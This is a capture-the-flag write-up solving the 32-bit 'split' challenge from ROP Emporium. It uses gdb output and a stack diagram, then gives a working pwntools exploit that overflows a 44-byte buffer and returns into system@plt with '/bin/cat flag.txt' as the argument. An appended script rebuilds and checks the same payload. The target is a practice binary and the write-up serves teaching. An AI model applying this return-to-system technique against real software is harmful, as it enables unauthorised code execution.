ROP Emporium split (32bit)
ROP Emporium
A site for practising ROP.
It was updated in July 2020 and a number of things seem to have changed.
split (32bit)
```
$ ./split32
split by ROP Emporium
x86

Contriving a reason to ask user for data...
> aaaa
Thank you!

Exiting
$ ./split32
split by ROP Emporium
x86

Contriving a reason to ask user for data...
> aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Thank you!
Segmentation fault
```
Let's analyse it with gdb.
```
$ gdb ./split32
gdb-peda$ i func
All defined functions:

Non-debugging symbols:
0x08048374  _init
0x080483b0  read@plt
0x080483c0  printf@plt
0x080483d0  puts@plt
0x080483e0  system@plt
0x080483f0  __libc_start_main@plt
0x08048400  setvbuf@plt
0x08048410  memset@plt
0x08048420  __gmon_start__@plt
0x08048430  _start
0x08048470  _dl_relocate_static_pie
0x08048480  __x86.get_pc_thunk.bx
0x08048490  deregister_tm_clones
0x080484d0  register_tm_clones
0x08048510  __do_global_dtors_aux
0x08048540  frame_dummy
0x08048546  main
0x080485ad  pwnme
0x0804860c  usefulFunction
0x08048630  __libc_csu_init
0x08048690  __libc_c
```
Let's look at usefulFunction.
```
gdb-peda$ disas usefulFunction
Dump of assembler code for function usefulFunction:
   0x0804860c <+0>:     push   ebp
   0x0804860d <+1>:     mov    ebp,esp
   0x0804860f <+3>:     sub    esp,0x8
   0x08048612 <+6>:     sub    esp,0xc
   0x08048615 <+9>:     push   0x804870e
   0x0804861a <+14>:    call   0x80483e0 <system@plt>
   0x0804861f <+19>:    add    esp,0x10
   0x08048622 <+22>:    nop
   0x08048623 <+23>:    leave
   0x08048624 <+24>:    ret
End of assembler dump.
gdb-peda$ x/s 0x804870e
0x804870e:      "/bin/ls"
```
It only calls system("/bin/ls"), which is not what we want.
Let's check the other symbols.
```
gdb-peda$ i var
All defined variables:

Non-debugging symbols:
0x080486a8  _fp_hw
0x080486ac  _IO_stdin_used
0x08048718  __GNU_EH_FRAME_HDR
0x08048894  __FRAME_END__
0x08049f0c  __frame_dummy_init_array_entry
0x08049f0c  __init_array_start
0x08049f10  __do_global_dtors_aux_fini_array_entry
0x08049f10  __init_array_end
0x08049f14  _DYNAMIC
0x0804a000  _GLOBAL_OFFSET_TABLE_
0x0804a028  __data_start
0x0804a028  data_start
0x0804a02c  __dso_handle
0x0804a030  usefulString
0x0804a042  __bss_start
0x0804a042  _edata
0x0804a044  __TMC_END__
0x0804a044  stdout
0x0804a044  stdout@@GLIBC_2.0
0x0804a048  completed
0x0804a04c  _end
```
Let's look at usefulString.
```
gdb-peda$ x/s 0x0804a030
0x804a030 <usefulString>:       "/bin/cat flag.txt"
```
That string looks usable.
main and pwnme are the same as in ret2win: the buffer overflow happens in pwnme, and the offset to the saved return address is 44 bytes.
So we overwrite the return address and call system("/bin/cat flag.txt"). On 32-bit x86 the argument is passed on the stack, so after the address of system@plt comes a dummy return address (where system would return to), followed by the pointer to usefulString as its first argument:
```
+--------------------+
|  AAAA   (44 bytes) |   padding up to the saved return address
+--------------------+
|     system@plt     |   overwritten return address
+--------------------+
|        BBBB        |   return address for system (never used)
+--------------------+
|    usefulString    |   first argument: "/bin/cat flag.txt"
+--------------------+
```
(I don't think it is really necessary this time either, but) I wrote a script.
```python
from pwn import *

p = process('./split32')
e = ELF('./split32')

# Addresses resolved from the binary (no PIE, so they are fixed)
plt_system = e.plt['system']
usefulString = e.symbols['usefulString']

payload = b'A' * 44             # padding up to the saved return address
payload += p32(plt_system)      # return into system@plt
payload += b'BBBB'              # dummy return address for system
payload += p32(usefulString)    # first argument: "/bin/cat flag.txt"

p.recv()
p.sendline(payload)
print(p.recvall().decode())
```
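As an added illustration (not part of the original writeup), the following builds the same frame with only the standard library and decodes it back into the fields of the stack diagram, so the byte layout can be checked without running anything. The addresses are the ones from the gdb output above.

```python
import struct

# Addresses taken from the gdb output above (split32 is not PIE, so they are fixed).
SYSTEM_PLT = 0x080483E0     # system@plt
USEFUL_STRING = 0x0804A030  # usefulString: "/bin/cat flag.txt"
OFFSET = 44                 # bytes from the buffer start to the saved return address


def build_frame(offset, target, arg, ret_after=b"BBBB"):
    """Lay out the 32-bit cdecl frame from the diagram:
    [padding][address to return into][return address for that call][first argument].
    Every word is 4 bytes, little-endian, as on x86."""
    return b"A" * offset + struct.pack("<I", target) + ret_after + struct.pack("<I", arg)


def decode_frame(payload, offset):
    """Split a payload back into the named fields of the diagram."""
    if len(payload) != offset + 12:
        raise ValueError("expected padding followed by exactly three 4-byte words")
    target, ret_after, arg = struct.unpack("<I4sI", payload[offset:])
    return {"padding": offset, "target": target, "ret_after": ret_after, "arg": arg}


def frame_matches_diagram(payload):
    """True if the payload is the system@plt / usefulString frame described above."""
    fields = decode_frame(payload, OFFSET)
    return fields["target"] == SYSTEM_PLT and fields["arg"] == USEFUL_STRING


if __name__ == "__main__":
    frame = build_frame(OFFSET, SYSTEM_PLT, USEFUL_STRING)
    for name, value in decode_frame(frame, OFFSET).items():
        print(f"{name:>9}: {value if not isinstance(value, int) else hex(value)}")
```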